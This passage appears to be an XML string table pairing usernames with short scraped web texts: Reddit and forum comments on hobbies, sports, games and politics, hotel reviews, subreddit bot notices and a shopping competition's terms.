    <t>obxtalldude</t>
  </si>
  <si>
    <t>I have found a ton of bicolor bolete look alikes lately... so frustrating that they are not edible when they are so big and beautiful!</t>
  </si>
  <si>
    <t>patrickj32</t>
  </si>
  <si>
    <t>Aren’t you supposed to direct these at the Make a Wish foundation ?</t>
  </si>
  <si>
    <t>desertdude69</t>
  </si>
  <si>
    <t>awesome dude! Nice hair!</t>
  </si>
  <si>
    <t>Lotus</t>
  </si>
  <si>
    <t>Reyes said: We are also getting a Stampede color page Click to expand... Click to shrink... Ugh</t>
  </si>
  <si>
    <t>tsrshr14fan</t>
  </si>
  <si>
    <t>As much as I can respect Newman always driving like the world is going to end, but there's a point where courtesy needs to at least be considered. All he had to do was give Matt a clear lane. He didn't even have to "let" him go. And the spotter shouldn't get any blame, either. Ryan has done this since 2000, and will do it until he retires. He owns it, and every other driver knows Newman doesn't give a shit about anybody but himself on track.</t>
  </si>
  <si>
    <t>" I received the products in a couple of days, that was amazing. Thanks. "</t>
  </si>
  <si>
    <t>RooskieCuck</t>
  </si>
  <si>
    <t>##*laughs in valiant breakthrough*</t>
  </si>
  <si>
    <t>Militant massacre...nice. This is a good way to end the day.</t>
  </si>
  <si>
    <t>Euro-Canuck</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=5eUxMoL49As</t>
  </si>
  <si>
    <t>four_vector</t>
  </si>
  <si>
    <t>Who is this clown, again? Hard to keep track these days.</t>
  </si>
  <si>
    <t>here-be-lions</t>
  </si>
  <si>
    <t>Golden Son is a gorydamn masterpiece</t>
  </si>
  <si>
    <t>featheredplanets</t>
  </si>
  <si>
    <t>ValerieJ said: You wouldn't want to give her chicks unless she has been broody for a couple weeks. You can try eggs, but with her getting up intermittently I'm not so sure she is a dedicated brooder yet. Are you wanting her to brood some chicks for you? Or were you just thinking about her and what she wants? I ask because I would approach those two scenarios differently. Click to expand... I don’t really need chicks but I thought it’d be nice for her to hatch some if she wants to.</t>
  </si>
  <si>
    <t>jamesdo72</t>
  </si>
  <si>
    <t>I always carry iwb. I am a large framed guy and t-shirts that fit my shoulders &amp; my muffin top, easily cover the extra grip length. Key to this in my opinion is a holster with a wing. The wing torques the grip back into the body. Check out FDO Industries.</t>
  </si>
  <si>
    <t>Sophia in Toronto</t>
  </si>
  <si>
    <t>Alex did an excellent job at finding the cause of our water damage and fixing the problem. It’s very difficult to find good, honest people to do the job so I am so glad I found him! He’s super efficient, friendly and professional.</t>
  </si>
  <si>
    <t>WeatherMonster</t>
  </si>
  <si>
    <t>Red Mars for the Rich!</t>
  </si>
  <si>
    <t>ThisSoho</t>
  </si>
  <si>
    <t>Cumming</t>
  </si>
  <si>
    <t>victor_mazo</t>
  </si>
  <si>
    <t>somebody in my gym class blew one up and the gym teacher was so fuckin confused and told him to throw it away. i don't think he realized what it was</t>
  </si>
  <si>
    <t>&gt;&gt;224223263 You assume there can be a global solution that fits all men in all cultures. She's damn right about that people have to solve their own problems. The best approach IS to simply throw around ideas on defining what the problem is on a general level and let people figure it out by themselves or in close-proximity groups. Besides, if she had gone to prescribe solutions, people would've rejected it even harder as shilling, brainwashing and what else. &gt;&gt;224223669 I think she isn't even a hardcore socialist. I dunno, haven't watched that many vids, but I don't see her wanting capitalism gone entirely. Besides, it's not like you aren't allowed to criticize "the machine" if being part of it is the pretty much the only viable option in life.</t>
  </si>
  <si>
    <t>jyrajensen</t>
  </si>
  <si>
    <t>The whole nation next, hopefully.</t>
  </si>
  <si>
    <t>&gt;&gt;808308878 4thelovdoffeet</t>
  </si>
  <si>
    <t>JDL</t>
  </si>
  <si>
    <t>My car after warming up would just die as I am slowing down to a stop. I took it to my mechanic and a couple of hours later he called me and said I need an idle control valve. He said the part would cost at least $500 and that I would need to find the part myself. I don't know much about cars and there are so many different ones to choose from. I don't want to purchase the wrong one. Any ideas on where I can find one? Thanks in advance</t>
  </si>
  <si>
    <t>StocksBondsHookers</t>
  </si>
  <si>
    <t>Is $1000 your total budget, or without optic?</t>
  </si>
  <si>
    <t>MannieOKelly</t>
  </si>
  <si>
    <t>Better yet, just have them blow up on launch . . .</t>
  </si>
  <si>
    <t>jk1043</t>
  </si>
  <si>
    <t>That explains a lot...</t>
  </si>
  <si>
    <t>SpringRed2000</t>
  </si>
  <si>
    <t>Who would wear this in public?</t>
  </si>
  <si>
    <t>eyehate</t>
  </si>
  <si>
    <t>We knew the local ladies hated us, so if a conversation was going poorly at a bar or we weren't interested, we would just tell them we were Navy. They would usually leave in short order.</t>
  </si>
  <si>
    <t>jcardoza</t>
  </si>
  <si>
    <t>That city knows the sadness of senseless violence unfortunately</t>
  </si>
  <si>
    <t>SomeMessedUpGuy</t>
  </si>
  <si>
    <t>I haven't spoken to them in years and my C-PTSD is rooted in more than just sexual abuse and it isn't from just family either. I'll have to look into that.</t>
  </si>
  <si>
    <t>kadsura</t>
  </si>
  <si>
    <t>So.. I haven't started at all. If I register today I think I'll get a little more serious. But do you guys think it's too late to start now?</t>
  </si>
  <si>
    <t>wheatorgy69</t>
  </si>
  <si>
    <t>I love it, it’s so cool the way you’re able to create textures. Any advice on where to start? Is there a definitive YouTube embroidery guru?</t>
  </si>
  <si>
    <t>[AU] - After a life of neglect, he was the youngest Australian charged with murder. Less than three years later, authorities lost track of him again | Sydney Morning Herald</t>
  </si>
  <si>
    <t>Betsey</t>
  </si>
  <si>
    <t>Only complaint is that our housekeeping wasn’t brilliant but this was quickly rectified once raised and the reception staff were very apologetic, also the room was very warm even with the air conditioning but this may be just a freak weather thing. Beautiful building, great breakfast and lovely staff who couldn’t do enough for you. Room was upgraded after I notified them of our wedding anniversary and complimentary bottle of wine provided. Hotel was quiet and really convenient location, short walk to tram and only 20 minutes into Dam or less to really pretty area of prisengracht with great bars and shops. Would stay again. Stayed in August 2019</t>
  </si>
  <si>
    <t>roll_for_pregnancy</t>
  </si>
  <si>
    <t>Agreed. I like Taboo, I think it has higher highs than Imperial but, at the same time, lower lows. I think Imperial is just more consistent from front to back than anything else he's done so far. I can pretty much play it start to finish without getting the urge to skip a song.</t>
  </si>
  <si>
    <t>Gr8kt</t>
  </si>
  <si>
    <t>Now that the insta normies are migrating to reddit, that means there will be people at my school who are insta normies on reddit and will try to flex because of it :(</t>
  </si>
  <si>
    <t>Vaidif</t>
  </si>
  <si>
    <t>Really? Do tell. Fascinating. What do you see?</t>
  </si>
  <si>
    <t>NineBillionTigers</t>
  </si>
  <si>
    <t>lol how are binary transpeople denying to reality of biological sex we're claiming to *be* a sex you're just disagreeing in order to force us into gender roles</t>
  </si>
  <si>
    <t>vegas7o2</t>
  </si>
  <si>
    <t>if you have these for front/rear t6.1 or a rear for the b6.1 please let me know</t>
  </si>
  <si>
    <t>You appear to have submitted a common or unoriginal thought. As such, it has been automatically removed. ------ **IMPORTANT: Please read [our rules](https://www.reddit.com/r/Showerthoughts/wiki/rules) and [the FAQ](https://www.reddit.com/r/Showerthoughts/wiki/faq)** ***in their entirety*** **before messaging the moderators.** Enquiries which have already been answered by these pages will not receive a response. Please also [do a Google search](http://www.google.com) for your thought to ensure that it is both original and unique. ------ *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/Showerthoughts) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>PhysicalGraffiti</t>
  </si>
  <si>
    <t>T REX said: ↑ The choices are on the outside...Eddie &amp; Sam's for Pizza or Hattrick's for wings Click to expand... Both good spots. I guess because I park in the garage I often don't venture out towards either, but they are easily in walking distance especially if you park a little bit out from the arena.</t>
  </si>
  <si>
    <t>fosdyke99</t>
  </si>
  <si>
    <t>Return to Hull FC - blackandwhites.co.uk Jump to: All views expressed are those of the author and not necessarily those of the RLFANS.COM or it's subsites. Whilst every effort is made to ensure that news stories, articles and images are correct, we cannot be held responsible for errors. However, if you feel any material on this website is copyrighted or incorrect in any way please contact us using the link at the top of the page so we can remove it or negotiate copyright permission. RLFANS.COM, the owners of this website, is not responsible for the content of its sub-sites or posts, please email the author of this sub-site or post if you feel you find an article offensive or of a choice nature that you disagree with. Copyright 1999 - 2019 RLFANS.COM You must be 18+ to gamble, for more information and for help with gambling issues see https://www.begambleaware.org/ .</t>
  </si>
  <si>
    <t>_Raspoootin_</t>
  </si>
  <si>
    <t>That entire write up trying to dissuade people from dismissing Slipknot because of their branding only served to solidify it more somehow. Side note: Carrie and Lowell absolutely destroys me</t>
  </si>
  <si>
    <t>BagelBites619</t>
  </si>
  <si>
    <t>Same year as the iPhone X. It came out like 1 or 2 months before the X came out.</t>
  </si>
  <si>
    <t>npewt</t>
  </si>
  <si>
    <t>Before I saw the picture, I assumed the title was implying you married a sibling or cousin</t>
  </si>
  <si>
    <t>FFBot</t>
  </si>
  <si>
    <t>___ ####PLEASE READ * How to post a [Player Discussion](https://redd.it/52xkzc) or [Injury Thread](https://redd.it/2koxce) * [Sub Rules and Guidelines](http://www.reddit.com/r/fantasyfootball/wiki/rules_guidelines) * [Our Wiki with tons of great content!](http://www.reddit.com/r/fantasyfootball/wiki/index) * [FAQ](/r/fantasyfootball/wiki/faq) ---- **The following users have helped the most people in all of the threads:** User | # Helped in thread -------|:-----: --- #[Official: [Trade] - Sat , 08/17/2019](/r/fantasyfootball/comments/crivko/official_trade_sat_08172019/) --- #[Official: [Simple Questions and League Issues] - Sat , 08/17/2019](/r/fantasyfootball/comments/crivlr/official_simple_questions_and_league_issues_sat/) --- #[Official: [Keeper] - Sat , 08/17/2019](/r/fantasyfootball/comments/crivmi/official_keeper_sat_08172019/) --- #[Official: [Who Do I Draft?] - Sat , 08/17/2019](/r/fantasyfootball/comments/crivnb/official_who_do_i_draft_sat_08172019/) --- #[Official: [Rate My Team] - Sat , 08/17/2019](/r/fantasyfootball/comments/crivoi/official_rate_my_team_sat_08172019/)</t>
  </si>
  <si>
    <t>farijuana</t>
  </si>
  <si>
    <t>it's fine to let them play with an uncut one as long as they are being supervised. there really hasnt been any reports of them injuring themselves, but yes, it might cause them to panic a little so if you leave a tube in their cage, maybe cut it. that being said, lots of hedgies will stop playing with the tubes once theyve been cut.</t>
  </si>
  <si>
    <t>OriginaIHum0r</t>
  </si>
  <si>
    <t>Censorship of memes behind the excuse of copyright, terror attacks everywhere except the countries such as Poland and Hungary, where they don’t let the refugees in. the EU still has it all.</t>
  </si>
  <si>
    <t>Pur1tas</t>
  </si>
  <si>
    <t>So midlane Tristana isn’t at least a semi assasin in your book considering her trading pattern essentially is jumping on you and bursting you down ? Or Lee sin? Or twitch? All of these essentially assasinate you and have rather burst focused trades / openings. Obviously you don’t have to play them like this but a bunch of people do. Jungle twitch assasinates people and so does lethality Lee sin.</t>
  </si>
  <si>
    <t>averagebrunch</t>
  </si>
  <si>
    <t>To be fair, you're not answering the questions you're being asked. I'm asking why you believe what you do and you're just telling me why you don't believe in other theories instead (and not very convincingly). Being completely honest with you, I've never had a discussion with someone who doesn't believe in evolution who could adequately explain the theory. To have a real logical debate you first need to establish your position. Define God, as you believe, and then establish why you believe this. You haven't done that. If you asked me why I believed in the effectiveness of radiology, and I answered "because I don't believe in the effectiveness of homeopathy", you would have my general thoughts on two different medical treatments bit not an answer to your question.</t>
  </si>
  <si>
    <t>Smifson</t>
  </si>
  <si>
    <t>How do you look like *a proclaimer?* They’re twins</t>
  </si>
  <si>
    <t>Cryzzalis</t>
  </si>
  <si>
    <t>I'm surprised this in the general sentiment only now, they've been this way for years.</t>
  </si>
  <si>
    <t>-NavyBluePaint-</t>
  </si>
  <si>
    <t>Juice and ever more than that, cringey</t>
  </si>
  <si>
    <t>SFSusan</t>
  </si>
  <si>
    <t>&gt;&gt;Duplicate information.&lt;&lt; Ah, sorry. I looked at the Yosemite forum to see if it had been posted, but obviously didn't look back far enough.</t>
  </si>
  <si>
    <t>ConjureWolf</t>
  </si>
  <si>
    <t>I think you're downplaying those extra 5 matches quite a lot. Whether or not you make 7th or 8th isn't mostly meaningless, and the ladder positions in the top 6 are huge. I dunno about the idea of the bottom 6 playing for draft picks, but it's more than being completely meaningless.</t>
  </si>
  <si>
    <t>zsombro</t>
  </si>
  <si>
    <t>&gt;this is some B cinema kind of dialogues are you new to Kojima games? B-movie dialogue is, like, his area of expertise</t>
  </si>
  <si>
    <t>14nicholas14</t>
  </si>
  <si>
    <t>Light pollution is probably what you think it is. A city with a lot of lights makes the surrounding area brighter and can make it harder to see stars and can affect the ecosystem. If all the lights suddenly shut off the light pollution would stop basically instantly. Light travels to fast for the dissipation time to be noticeable. Light pollution can affect areas away from the source because the atmosphere/clouds can reflect the light but generally the farther away from cities and light the less light pollution there is.</t>
  </si>
  <si>
    <t>^^^^AUTOMOD ***The following is a copy of the above post. This comment is a record of the above post as it was originally written, in case the post is deleted or edited. Read [this](https://www.reddit.com/r/AmItheAsshole/wiki/faq#wiki_post_deletion) before [contacting the mod team](https://www.reddit.com/message/compose?to=%2Fr%2FAmItheAsshole)*** About 5 years ago I had a nose job solely because I didn’t like the way it looked. It wasn’t a huge drastic change, there was a slight bump that I didn’t like so I saved up money and got it done. I don’t think I look completely different, my nose is definitely more proportional and fitting to my face than before but I still look more or less the same. So my boyfriend and I have been dating for about 7 months now and we’ve gotten along really well up until now. He recently met my family for the first time and I should mention that my mom and sisters all have similar noses to what I had before. he also saw some of my childhood pictures. He confronted me afterwards asking if I had plastic surgery and so I said yes. He got pretty upset and said I should have told him early on. I told him that I’m not ashamed of it and I genuinely wasn’t trying to hide it from him, it had just never really come up. I told him all the details about it like why I did it, how long ago, etc. Anyways he thinks I misled him and broke up with me. Although I do understand how he might be feeling but I think he’s overreacting by calling me a liar and saying I catfished him. I don’t know what to do now. If I am the asshole, how should should I go about this for future reference. When and how should I have brought it up? *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AmItheAsshole) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>ForgettableUsername</t>
  </si>
  <si>
    <t>&gt; Grenades can be made Are you suggesting that people who own grenade launchers will home-brew their own grenades? That's not a very realistic scenario.</t>
  </si>
  <si>
    <t>Paul</t>
  </si>
  <si>
    <t>Service was exemplary. MD John Nevin takes a very hands on roll and goes above and beyond to make sure customer service is superb and guests want for nothing. Go raibh maith agat for everything John. Stayed in August 2019</t>
  </si>
  <si>
    <t>1fallen</t>
  </si>
  <si>
    <t>Quick answer: every time you virtualize something, you get a penalty over running it on the bare hardware. That means that the OS running in virtual machine will run slower than if it would run directly on that same machine without virtualization layer. That's true for any OS on commodity hardware, with exception for some exotic hardware that is purposefully built to support virtualization from the ground up - and that's not the off-the-shelf computer. EDIT: I may have jumped the gun here, and rbmorse is right as far as the same needed tools IE: AntiVirus, DiskTools, and anything else the user would need to have in a Windows environment.</t>
  </si>
  <si>
    <t>Blueblood</t>
  </si>
  <si>
    <t>https://camberwellshopping.com.au/competitions/what-makes-your-mum-super-mothers-day-2019/ Win $500 to spend in Camberwell What makes your mum super? Its Mothers Day on Sunday, 12 May. Tell us what makes your mum super for the chance to win a $500 Camberwell Shopping voucher* to spend on pampering your mum this Mothers Day. Who is running thecompetition? The Promoter is Camberwell Centre Association (ABN 42 467 190 205), P.O. Box 183 Camberwell VIC 3124. When will the competition start and end? The competition starts at 12.01 am(AET) on26/04/19and ends at 11.59pm (AET) on13/05/19.Who can enter?Only Australian residents canenter.Who can'tenter?0BDirectors, officers, management and employees of:a) 1Bthe Promoter;b) 2Bthe agencies or companies associated with this competition or the Promoter; orc) 3Bthe retail stores located in the Camberwell precinct,and the immediate families of those people, can't enter.Where will the competition run? The competition will run in participating stores (Store)inthe Camberwell precinct, in Victoria. Entry instructions 4BVisit https://camberwellshopping.com.au/competitions/what-makes-your-mum-super-mothers-day-2019/a ) 5BTell us what makes your mum superb) 6Bfill out and submit the online entry form and all other requested information,7Bto receive 1 entry into the prize draw.How many winners will there be and how will they be chosen? There will be 1 winner determinedin respect of this competition.The draw will be held at 1pm (AET) on 14/05/19 at 322/282 Collins St, Melbourne VIC 3000.The top valid entries as judged by the Promoter will win the prizes. The judges decision is final and no correspondence will be entered into.The Promoter may draw additional reserve entries and record them in order, in case the winning entry/entrant is deemed invalid. What can I win?There is 1 prize available. The prize is a shopping voucher valid at any Camberwell shopping precinct Store, valued at $500 for the major prize draw. If you win, you must collect the prize from the Camberwell Centre Association office.Total prize poolThe total prize pool is $500.How many times can I enter?Entrants will be eligible for a single entry in the prize draw.How and when will the winner be informed?If you are the winner, youwill be informed in writing via email on 14/05/19 and your name and state/territory of residence will be published on the Promoter's Facebook page atwww.facebook.com/camberwellshopping/ on 23/05/19 and in the Promoter's E-Newsletter. If I win,when must I claim my prize?You must claim your prizeby 1pm (AET) on 20/06/19.What if I don't claim my prize on time? If theprize has not been accepted or claimedby 1pm (AET) on 20/06/19 or if, after making all reasonable attempts, the Promoter can't contact the drawn winner (or the drawn winner does not contact the Promoter) by this time and date, the relevant entry will be discarded and the Promoter will re-award the prize by carrying outan unclaimed prize draw at 1pm (AET) on 21/06/19 (Unclaimed Prize Draw) at the same location as the original draw to distribute the prize. All entries received during the Competition Period will be combined for the purposes of this draw. If you are a winner in the UnclaimedPrize Draw you will be informed by email within two days of the Unclaimed Prize Draw and your name and state/territory of residence will be published on the Promoter's Facebook page atwww.facebook.com/camberwellshopping/ and in the Promoter's E-Newsletter.</t>
  </si>
  <si>
    <t>susanoblade</t>
  </si>
  <si>
    <t>why the hell do you care? its a flagship phone - there's no reason why you're not getting regular updates. people pay for a service, they expect the best.</t>
  </si>
  <si>
    <t>yorkieboy2019</t>
  </si>
  <si>
    <t>Corbyn has one goal though and will do anything to achieve it. Going to paraphrase a quote from Game of Thrones but its a very fitting quote. “Corbyn would see the realm burn if he could be PM of the ashes”</t>
  </si>
  <si>
    <t>Euphorian11</t>
  </si>
  <si>
    <t>Just a chip off the old block</t>
  </si>
  <si>
    <t>Nickamal</t>
  </si>
  <si>
    <t>Summary: This printer prints in amazing quality. I am glad to have it for me.</t>
  </si>
  <si>
    <t>noahthebroah89</t>
  </si>
  <si>
    <t>Hyperbole in terms of only drinking and sleeping... Congrats on your PSC you probably have to defend capitalism in order to rationalize your life working 80hrs a week and not able to do anything except “time w friends and family” whatever that means... “Money is more important”... exactly why I don’t care what you think. Money comes and goes. Your life is your work.</t>
  </si>
  <si>
    <t>dd1</t>
  </si>
  <si>
    <t>I've removed the 2 screws but i can't move the panel. it seems like there most be more screws holding it. I have attached a photo. IMG_20190801_153006375.jpg IMG_20190801_153016142.jpg IMG_20190801_153042772.jpg</t>
  </si>
  <si>
    <t>ckc123</t>
  </si>
  <si>
    <t>CoCoD said: ↑ No kids here, but #HearMeOut... I never wanted kids, but this is one of the reasons why. I have a friend I will call *Charmaine. 3 kids, 3 dads. Only 1 is super daddy. (She cheated on baby daddy #2 to be with baby daddy #3, and both kid #2 and kid #3 are 18 months apart.... long story.) Super daddy took their daughter to Disneyland, Hawai'i and all other places while the other kids just sat back disappointed. She told me that she shrugged her shoulders and explained to them "It's her Dad, and I can't do anything about it." Badu is a rare example of having 3 kids between multiple men and it working out fine. Click to expand... that just sounds terrible. i feel bad for those kids. i always feel so grateful that me and my sibling are both of our parents only kids. they made sure of it!</t>
  </si>
  <si>
    <t>LoLs11</t>
  </si>
  <si>
    <t>How does staying out of ww2 count as American Imperialism?</t>
  </si>
  <si>
    <t>ivoyvinx</t>
  </si>
  <si>
    <t>True, now that you mention it, you are actually very likely to hear someone from Quebec to announce themselves as so. Very large identity difference between them and the rest of Canada and I suppose you could apply that as to why Americans might associate with their individual states so strong. Interesting how the "United States" is so divided in some respects, but I guess that's an entirely different discussion</t>
  </si>
  <si>
    <t>qwertgoat548</t>
  </si>
  <si>
    <t>Right</t>
  </si>
  <si>
    <t>RambockyPartDeux</t>
  </si>
  <si>
    <t>Hey someone should pay you for teaching the blind.</t>
  </si>
  <si>
    <t>that_mom_friend</t>
  </si>
  <si>
    <t>I have a relative that’s a dr. He hates it. The hours are insane. He says office “politics” are like high school drama but worse because you’re career is on the line if you piss off the wrong people. He’s had to move cross county a few times to get away from conflicts with coworkers. He pays so much for licensing and insurance now and owes so much in student loans to get where he is that he calculated that at this rate, he’ll pay off his student loans when he’s 85. He talks often about quitting but he’s got so much student debt that there’s no other job he could get that would pay enough to cover his debts. So your job now might not be great, but the grass may not have been much greener if you’d stayed in premed! If you’re not miserable and in debt till you’re 85, you may actually have picked the better path.</t>
  </si>
  <si>
    <t>nomarmite</t>
  </si>
  <si>
    <t>The forecast I use is not quite as doom-laden as you suggest, but nevertheless it will not be warm. It's the mountains and it's the start of autumn, so it's not entirely unexpected. It is always close to freezing in the mountains between sunset and sunrise at this time of year, so you need some warm clothing regardless of the forecast specifics.</t>
  </si>
  <si>
    <t>FarFeather91497</t>
  </si>
  <si>
    <t>The fact that I know a useless fact.</t>
  </si>
  <si>
    <t>PSA: Make it a habit of reading the [rules](https://www.reddit.com/r/Gamingcirclejerk/about/rules) of each subreddit you participate in: **Rule 7: No Participation in Linked Threads (Brigading)**: *Do not vote or comment in threads you've found through /r/gamingcirclejerk* **Rule 9: No Fake Posts on Other Subs (Contamination)**: *Do not create fake posts on other subs only to post back here. Also, do not "lol, you should post this on r / OtherSub". It's considered interfering with their content and can also lead to brigading.* *This is a reminder to the readers. The post itself is untouched.* *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/Gamingcirclejerk) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Carlthellamakiller</t>
  </si>
  <si>
    <t>I know this might be weird to handle but I missed the Arkham games and I have a PS4 now, loved Spider man. Are they worth getting at this point? or are they kinda dated</t>
  </si>
  <si>
    <t>Alresford</t>
  </si>
  <si>
    <t>Ask the royal family</t>
  </si>
  <si>
    <t>rogeoge5</t>
  </si>
  <si>
    <t>Aw. I'm so sorry.</t>
  </si>
  <si>
    <t>CloudyMNDaze</t>
  </si>
  <si>
    <t>How do we watch the game tonight?</t>
  </si>
  <si>
    <t>ChefBoiiz</t>
  </si>
  <si>
    <t>Australia, New Zealand, Ireland, The US, Canada, South Africa, PNG, Japan, Southern Philippines. Sounds like no one to me, asshole.</t>
  </si>
  <si>
    <t>freeeefalling</t>
  </si>
  <si>
    <t>That guy definitely has some brass balls. 'Intestinal fortitude' whatever you want to call it.</t>
  </si>
  <si>
    <t>parhelion12</t>
  </si>
  <si>
    <t>Look here, Peter! We've got a million of these hair pieces. I don't care if the sets make sense. Find a way to use them!</t>
  </si>
  <si>
    <t>Head_10</t>
  </si>
  <si>
    <t>Our situation / parenting is way different than theres Here in our country if our mom scold or beat us we don’t call child services but they do So chill children in our country are somewhat different.. But there will exception in every 100 people but no worries we don’t provide guns to common citizens</t>
  </si>
  <si>
    <t>danwins23</t>
  </si>
  <si>
    <t>It’s impossible to pick between the two tbh but Adams floor last year kept me alive so I’m going with him</t>
  </si>
  <si>
    <t>OptimalCarpenter</t>
  </si>
  <si>
    <t>Unless it’s a severe medical emergency and you have an ethical obligation to say “GO TO A DOCTOR”, this is a beyond useless comment. Yes, the right doctor would probably be able to answer this question. When I see him next Tuesday. If I want a health answer RIGHT NOW, your post is just more to scroll through.</t>
  </si>
  <si>
    <t>JanJaapen</t>
  </si>
  <si>
    <t>I’ll never lose 52 levels. Because I don’t pay attention long enough to get there..</t>
  </si>
  <si>
    <t>&gt;&gt;13698013 because i wanted to point out that some aspects of morality are universally agreed upon (killing people is immoral unless you’re a psychopath), and there some more ambiguous things - the grey area of which i talked about and this grey area isn’t about things which are bad in itself (cause actual harm, pain), but about things relating to customs, which are up to individual’s conscience</t>
  </si>
  <si>
    <t>narf007</t>
  </si>
  <si>
    <t>Oof. I'll just stick with cum to help differentiate the two more easily.</t>
  </si>
  <si>
    <t>SpiritualMistake4</t>
  </si>
  <si>
    <t>probably because her animations was just a backflip wich made her do like 20 cm,but then they standardised roll distance at the same time,so she is now a rolling girl falling off stairs.</t>
  </si>
  <si>
    <t>Larzionius</t>
  </si>
  <si>
    <t>I really love that blue</t>
  </si>
  <si>
    <t>Dokurushi</t>
  </si>
  <si>
    <t>The government isn't forcing companies to burn the forest down. Companies are doing it of their own will, for profit. The fact that they're encouraged by a far-*right* politician doesn't make their actions socialist.</t>
  </si>
  <si>
    <t>Luckypeople71</t>
  </si>
  <si>
    <t>You need to get a life too! Because this is insane. To say his mom is going to be butt hurt-but too bad, how immature. Why is it important to you to get back at his mom, if your only goal is to get him proper footwear? Like an adult would and not hang everyone’s head over it. Maybe don’t be involved ok.</t>
  </si>
  <si>
    <t>YakouMeiteGOAT</t>
  </si>
  <si>
    <t>Who to?</t>
  </si>
  <si>
    <t>RaineyJ</t>
  </si>
  <si>
    <t>I thought it was the pointer from a craps roulette wheel...</t>
  </si>
  <si>
    <t>BurntBacn</t>
  </si>
  <si>
    <t>holy shit that sub is cancerous. There's literally a post about how no men should be allowed guns because they're all irresponsible and that only women should be allowed them.</t>
  </si>
  <si>
    <t>Throwaway127699</t>
  </si>
  <si>
    <t>In answer to the first set of questions: that depends if you live in the US or the rest of the world . (Jokes aside, I get your point). Strong “get some therapy/counselling” vibe is something I’m going to take away from this thread. Thanks.</t>
  </si>
  <si>
    <t>Elitemation</t>
  </si>
  <si>
    <t>Send this to UNFUNNY mAnN</t>
  </si>
  <si>
    <t>Thosewholost</t>
  </si>
  <si>
    <t>I am in the navy in aircraft paint dept. For stenciling we use software called Gerber Omega with some old ass plotter. There is no how to's or guides when I got here just a trial and error on how to use it. I just need help on how to convert image to outline. Any help would be appreciated</t>
  </si>
  <si>
    <t>jonelliottart</t>
  </si>
  <si>
    <t>[For Hire] Dark Fantasy / Fantasy / Sci-Fi / D&amp;D Commissions</t>
  </si>
  <si>
    <t>Nembo1777</t>
  </si>
  <si>
    <t>tifosi12 said: ↑ This. Ocon as a Frenchman will fit perfectly for Renault's advertisements. That's about it. Click to expand... Yep he sounds as French with his Spanish first and last name as Ricciardo sounds Aussie (!), perfect match !</t>
  </si>
  <si>
    <t>xPhoenixFiresx</t>
  </si>
  <si>
    <t>I’ve come up with a solution B A T H S **Note** May get attacked by the bath counterpart</t>
  </si>
  <si>
    <t>StocksandVagabonds</t>
  </si>
  <si>
    <t>American - former engineer turned peace corps volunteer living and working in Rural South America! @life_ofkyy</t>
  </si>
  <si>
    <t>WyrdThings</t>
  </si>
  <si>
    <t>I will not taint your hope sir. Follow your dreams.</t>
  </si>
  <si>
    <t>houseshoes93</t>
  </si>
  <si>
    <t>Is this NF guy really hot in your cities? I'm trying to do some research real quick</t>
  </si>
  <si>
    <t>littlewolfskin</t>
  </si>
  <si>
    <t>Why would it be going too far? He decided to act like an unprofessional ass on his shift, not you. If it were my employee I’d want to know if he was harassing customers. Play stupid games, win stupid prizes.</t>
  </si>
  <si>
    <t>tommytoan</t>
  </si>
  <si>
    <t>im not one, but a lot of my friends are those people, they arent buying 70km away from perth for the new car but for a mortgage that doesn't cripple their soul. you may spend an hour in the car but you spend your life in the house! and when you get kids the money side of things start to change your mind.</t>
  </si>
  <si>
    <t>Pigeonsim</t>
  </si>
  <si>
    <t>Yes sure, I'm just curious what price is fair for you of that kind of service. Not all can buy a right SIM because of location they live and so on. I'm preparing service who supply dedicated SIM cards for messaging online and are accessible/automated 24/7. SIM cards to rent for a day / month / year. Europe only at the moment. Once it will be done you will find this somewhere on the forum.</t>
  </si>
  <si>
    <t>jahurley94</t>
  </si>
  <si>
    <t>Yeah and players actually need to stay in their positions. All of our midfielders are tripping over each other. There is zero communication when we press. This is why we have gotten burnt out the last two games after 30 minutes. People are running around pressing for no reason. There is nothing efficient about how we are trying to play.</t>
  </si>
  <si>
    <t>HollowedVeri</t>
  </si>
  <si>
    <t>At a party later that year I got drunk and drank bong water. I would NOT recommend it</t>
  </si>
  <si>
    <t>VICOwner</t>
  </si>
  <si>
    <t>Personally I don’t think it matters. If every two or three years I have to spend $50-$100 replacing output tubes on a amp, I got plenty of entertainment. If it occurs sooner than that, I really got entertained.</t>
  </si>
  <si>
    <t>bloodflart</t>
  </si>
  <si>
    <t>I give the h-heat</t>
  </si>
  <si>
    <t>Xetren</t>
  </si>
  <si>
    <t>Yes, that is what I said. The players are _affected,_ but they aren't the ones _dealing_ with it, Epic is.</t>
  </si>
  <si>
    <t>Reddit-october</t>
  </si>
  <si>
    <t>Distraction or sundowning?</t>
  </si>
  <si>
    <t>redditor_for_0_days</t>
  </si>
  <si>
    <t>I've done this on Distrokid several times. You just need to make sure you're paying for the second tier plan, because you'll want to be able to specify the same ISRC code for both tracks.</t>
  </si>
  <si>
    <t>Mariahsmummy225</t>
  </si>
  <si>
    <t>This world is tough at times. Cry if you need to, have to or want to.</t>
  </si>
  <si>
    <t>Mothhunter26x2</t>
  </si>
  <si>
    <t>Aye buddy, I feel ya. Try to save 1,000 gems and buy 11 packs every week at least. Save sparks for commons, rares, and event cards. Look up Fry Em Up best budget deck I just maxed this deck out yesterday and I’m rank 30 now. Good luck I hope you read this . My UN is Mothhunter52</t>
  </si>
  <si>
    <t>bifowww</t>
  </si>
  <si>
    <t>Which is not padded on the outside please Last year down jacket was a nice piece, but I couldn't order it because I look ugly in those jackets.</t>
  </si>
  <si>
    <t>-_AK_-</t>
  </si>
  <si>
    <t>How do I get the character moving around again after going ragdoll? He responds to all the inputs I put in, but stays in the last spot he was at during the ragdoll rather than going back upright and moving around again. I'm using blueprints.</t>
  </si>
  <si>
    <t>stavigustav</t>
  </si>
  <si>
    <t>Good looking pickup! Keep us up to date. More pics!</t>
  </si>
  <si>
    <t>bananagas</t>
  </si>
  <si>
    <t>Preferably 18 but 19 is ok. Hub will work also . Ktm substitutions ok also.</t>
  </si>
  <si>
    <t>jakeslash</t>
  </si>
  <si>
    <t>All gay except for u/gravesEZ</t>
  </si>
  <si>
    <t>Atomicchinampa</t>
  </si>
  <si>
